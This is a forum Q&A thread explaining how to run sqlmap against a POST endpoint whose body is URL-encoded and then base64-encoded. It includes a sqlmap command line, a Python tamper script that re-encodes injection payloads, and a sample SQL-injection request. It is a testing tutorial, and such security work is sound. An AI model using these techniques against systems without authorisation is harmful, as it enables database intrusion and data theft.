run sqlmap with http post request with encoding data

Question

I have a target that http post request from that encoded As follows:

data request post first url encoded and then base64 encoded.

example request post from mentioned target As follows:

POST /test/test-page.php HTTP/1.1
Host: target.com
bmFtZTElM0R2YWx1ZTElMjZuYW1lMiUzRHZhbHVlMg==

for decoding data request post first must base64 decode and then url decode. actualy after decoding Something like the following:

POST /test/test-page.php HTTP/1.1
Host: target.com
name1=value1&name2=value2

Now my question is: how to run sqlmap on this target while injected queries in parameter values from data request post and then encode Similar as mentioned and then send to server target

Arminius · Accepted Answer · 2017-01-07T17:05:14.970

Sqlmap supports multiple ways to process parameters with custom code. You can use --eval to base64-encode a single parameter, like so:

--eval "import base64; paramname = base64.b64encode(paramname)"

Also, you can use the --tamper parameter to load a custom python script that modifies the payload.

Unfortunately it's not straightforward to tamper with the entire POST query string. But here is a suggestion for a workaround:

Specify an empty data string in your sqlmap command (use the asterisk (*) to indicate the injection point) and declare a --tamper script:

$ ./sqlmap.py -u "http://example.com/" --data "*" --method POST --tamper mytamper

The tamper script could look like this:

import base64
import urllib

def tamper(payload, **kwargs):
    params = 'name1=value1%s&name2=value2' % payload

    data = urllib.quote_plus(params)
    data = base64.b64encode(data)

    return data

This script inserts the payload into your query and performs the URL-encoding and base64 conversions. It currently tests for the name1 parameter. You would have to change the injection point manually if you want to check the other one.

For the sample payload ) AND 3825=3825 AND (7759=7759 you would end up with a request like this:

POST / HTTP/1.1
Host: example.com
User-agent: sqlmap/1.0-dev-6fef294 (http://sqlmap.org)
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
[...]
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 92
Connection: close

bmFtZTElM0R2YWx1ZTElMjkrQU5EKzM4MjUlM0QzODI1K0FORCslMjg3NzU5JTNENzc1OSUyNm5hbWUyJTNEdmFsdWUy

As you can see the POST body is URL- and base64-encoded.

very thankful. and I would also offer you to visit this **link** (https://github.com/sqlmapproject/sqlmap/issues/2335#issuecomment-271121099) — alrz, Jan 08 '17 at 11:37

run sqlmap with http post request with encoding data

1 Answers1